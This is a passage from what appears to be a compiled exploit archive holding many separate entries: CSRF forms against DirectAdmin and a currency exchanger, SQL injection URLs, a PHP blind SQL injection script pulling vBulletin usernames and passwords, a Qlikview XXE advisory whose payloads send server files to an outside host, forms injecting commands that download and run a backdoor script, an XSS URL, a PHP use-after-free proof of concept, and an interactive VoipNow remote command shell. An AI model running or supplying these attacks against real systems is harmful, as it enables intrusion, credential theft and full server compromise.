<input type="hidden" name="type" value="ftp">
<input type="hidden" name="type" value="user">
<input type="hidden" name="type" value="custom">
<input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new Database
<form name=reseller action="http://address:port/CMD_DB" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name=domain value="domain.xyz"> <!-- Domain -->
<input type="hidden" name="name" value="dbname"> <!-- Database Name -->
<input type="hidden" name="user" value="ehsan"> <!-- Username -->
<input type="hidden" name="passwd" value="pass1234"> <!-- Password -->
<input type="hidden" name="passwd2" value="pass1234"> <!-- Password -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new E-Mail Forwarder
<form name=info action="CMD_EMAIL_FORWARDER" method="post">
<input type=hidden name=action value=create>
<input type=hidden name=domain value="domain.xyz"><!-- Domain -->
<input type="hidden" name="user" value="info"> <!-- Forwarder Name -->
<input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)
source: https://www.securityfocus.com/bid/56862/info
FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20
source: https://www.securityfocus.com/bid/56877/info
The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js
function usage ()
{
echo
"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"\n[+] Author: Cold z3ro".
"\n[+] Site : http://www.example.com | www.example.com".
"\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"\n[+] Note. : Its a 0day exploit\n\n";
exit ();
}
function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = 'ajax.php?do=CheckUsername¶m=';
$inj.=
"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
if (count ($argv) != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me
?>
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: QLIK
Product & Version:
QlikView v11.20 SR4
Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview
Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx
Attack Pattern for SSRF:
------------------------
In POST body:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
OR simply
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
Attack Pattern for reading and extracting arbitrary files:
------------------------------------------
In POST body:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]]>
The test.dtd file on yourserver.com will need to contain the following:
Test.dtd
--------
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;
As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.
(4)Solution:
------------
Upgrade to QV11.20 SR12 will correct the vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
source: https://www.securityfocus.com/bid/56881/info
Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.
1.
<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
2.
<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
3.
<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
4.
<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]
------------------------------------
details:
------------------------------------
auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
is able to abuse of this vulnerability to change password by a hidden
iframe in another page.
-------------------------------------
Exploit:
-------------------------------------
-->
<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action='http://farhadexchange.com/signup.php'
target="xsrf-frame" id="xsrf-form">
<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0" value="testpassword123456" > </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1" value="testpassword123456" ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
</label>
<label id="n_country">
<input type='hidden' name="country" id="country" style="width:196;"
value="IR">
</label>
<label id="cid">
<input type='hidden' name='cid' value='2'/>
</label>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>
</label>
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>
source: https://www.securityfocus.com/bid/56882/info
Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Taoguang Chen <[@chtg](http://github.com/chtg)> -
Write Date: 2015.8.27
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
while(*p == ':') {
++p;
ALLOC_INIT_ZVAL(elem);
if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&elem);
goto error;
}
spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
}
It has been demonstrated many times before that __wakeup() leads to
ZVAL is freed from memory. However during deserialization will still
allow to use R: or r: to set references to that already freed memory.
It is possible to use-after-free attack and execute arbitrary code
remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
class obj {
var $ryat;
function __wakeup() {
$this->ryat = 1;
}
}
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
$inner = 'i:1234;:i:1;';
$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
$data = unserialize($exploit);
var_dump($data);
function ptr2str($ptr)
{
$out = '';
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(5) {
[0]=>
int(1)
[1]=>
&int(1)
[2]=>
object(obj)#2 (1) {
["ryat"]=>
&int(1)
}
[3]=>
array(1) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
[4]=>
string(24) "?v?B????"
}
source: https://www.securityfocus.com/bid/57009/info
The Transactions Plugin for MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Transactions 2.0 is vulnerable; other versions may also be affected.
http://www.example.com//bank.php?transactions=[SQLi]
source: https://www.securityfocus.com/bid/57032/info
VoipNow Service Provider Edition is prone to a remote arbitrary command-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.
Versions of VoipNow Service Provider Edition prior to 2.3 are vulnerable; other versions may also affected.
<?
# Title: 4psa VoipNow < 2.3 , Remote Command Execution vuln
# Software Link: http://www.4psa.com/products-4psavoipnow.html
# Author: Faris , aka i-Hmx
# Home : sec4ever.com , 1337s.cc
# Mail : n0p1337@gmail.com
# Tested on: VoipNow dist.
/*
VoipNow suffer from critical RCE vuln.
Vulnerable File : plib/xajax_components.php
Snip.
if ( isset( $_GET['varname'] ) )
{
$func_name = $_GET['varname'];
$func_arg = $_POST["fid-".$_GET['varname']];
$func_params = $_GET;
if ( function_exists( $func_name ) )
{
echo $func_name( $func_arg, $func_params );
}
else
{
echo "<ul><li>Function: ".$func_name." does not exist.</li></ul>";
}
}
Demo Exploit :
Get : plib/xajax_components.php?varname=system
Post : fid-system=echo WTF!!
so the result is
echo system( 'echo WTF!!', array() );
the system var need just the 1st parameter
so don't give fu#* about the array :D
Peace out
*/
echo "\n+-------------------------------------------+\n";
echo "| VoipNow 2.5.3 |\n";
echo "| Remote Command Execution Exploit |\n";
echo "| By i-Hmx |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, false);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
while(1)
{
echo "\ni-Hmx@".str_replace("https://","",$target)."# ";
$cmd=trim(fgets(STDIN));
if($cmd=="exit"){exit();}
$f_rez=faget($target."/plib/xajax_components.php?varname=system","fid-system=$cmd");
echo $f_rez;
}
# NP : Just cleaning my pc from an old old trash , The best is yet to come ;)
?>